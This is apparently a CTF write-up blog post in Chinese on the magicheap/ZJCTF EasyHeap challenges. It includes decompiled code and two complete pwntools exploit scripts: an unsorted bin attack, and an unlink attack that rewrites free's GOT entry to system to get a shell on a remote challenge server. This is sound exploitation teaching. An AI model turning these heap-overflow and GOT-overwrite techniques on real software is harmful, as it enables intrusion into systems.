HITCON Training Lab14 Unsorted Bin Attack Magicheap & [ZJCTF 2019]EasyHeap

wjh 收录于 Pwn

2020-11-20 2024-02-12 约 700 字预计阅读 2 分钟 - 次阅读 - 条评论

注意

本文最后更新于 2024-02-12，文中内容可能已过时。

现在居然可以一次过了，有点惊讶

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  int v3; // eax
  char buf; // [rsp+0h] [rbp-10h]
  unsigned __int64 v5; // [rsp+8h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 2, 0LL);
  while ( 1 )
  {
    while ( 1 )
    {
      menu();
      read(0, &buf, 8uLL);
      v3 = atoi(&buf);
      if ( v3 != 3 )
        break;
      delete_heap();
    }
    if ( v3 > 3 )
    {
      if ( v3 == 4 )
        exit(0);
      if ( v3 == 4869 )
      {
        if ( (unsigned __int64)magic <= 4869 )
        {
          puts("So sad !");
        }
        else
        {
          puts("Congrt !");
          l33t();
        }
      }
      else
      {
LABEL_17:
        puts("Invalid Choice");
      }
    }
    else if ( v3 == 1 )
    {
      create_heap();
    }
    else
    {
      if ( v3 != 2 )
        goto LABEL_17;
      edit_heap();
    }
  }
}

create_heap()，申请大小可以自定义 edit_heap()，有堆溢出漏洞。 delete_heap(), 删除后指针至0 这道题应该也可以fastbin attack，所以不能算是典型的例题，等下去找一道unsorted bin attack 和 fastbin attak 打搭配的题目。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
# -*- coding: utf-8 -*-
from pwn import *
r = process("./magicheap")
context.log_level = "debug"
def create_heap(size, content):
    r.sendlineafter("Your choice :", "1")
    r.sendlineafter("Size of Heap : ", str(size))
    r.sendlineafter("Content of heap:", content)

def edit_heap(idx, size, content):
    r.sendlineafter("Your choice :", "2")
    r.sendlineafter("Index :", str(idx))
    r.sendlineafter("Size of Heap : ", str(size))
    r.sendlineafter("Content of heap : ", content)

def delete_heap(idx):
    r.sendlineafter("Your choice :", "3")
    r.sendlineafter("Index :", str(idx))
magic = 0x00000000006020C0
create_heap(0x18, 'a')
create_heap(0x88, 'b')
create_heap(0x18, 'c')
delete_heap(1)
payload = 'a' * 0x18 + p64(0x91) + p64(0) + p64(magic - 0x10)
edit_heap(0, len(payload), payload)
create_heap(0x88, 'd')
r.sendlineafter("Your choice :", "4869")
r.interactive()

2020-11-29更新
这两道题目是一模一样的，但是 [ZJCTF 2019]EasyHeap 在buuoj上面直接利用magic，cat不出来，可能是配置的问题，所以我利用unlink做了一遍。
from pwn import *
from LibcSearcher import *
context.log_level = "debug"
#r = process('./easyheap')
r = remote('node3.buuoj.cn', 26026)
elf = ELF('./easyheap')

def choice(idx):
    r.sendlineafter("Your choice :", str(idx))

def create_heap(size, content):
    choice(1)
    r.sendlineafter("Size of Heap : ", str(size))
    r.sendlineafter("Content of heap:", content)

def edit_heap(idx, content):
    choice(2)
    r.sendlineafter("Index :", str(idx))
    r.sendlineafter("Size of Heap : ", str(len(content)))
    r.sendlineafter("Content of heap : ", content)

def delete_heap(idx):
    choice(3)
    r.sendlineafter("Index :", str(idx))

create_heap(0x88, 'b')
create_heap(0x88, 'b')
#delete_heap(1)
ptr = 0x00000000006020E0
FD = ptr - 0x18
BK = ptr - 0x10

edit_heap(0, p64(0) * 2 + p64(FD) + p64(BK) + 'a' * (0x88 - 0x20 - 0x8) + p64(0x80) + p64(0x90))
delete_heap(1)
#gdb.attach(r)
edit_heap(0, 'a' * 0x18 + p64(elf.got['free']))
edit_heap(0, p64(elf.plt['system']))
create_heap(0x18, 'sh\x00')
delete_heap(1)
r.interactive()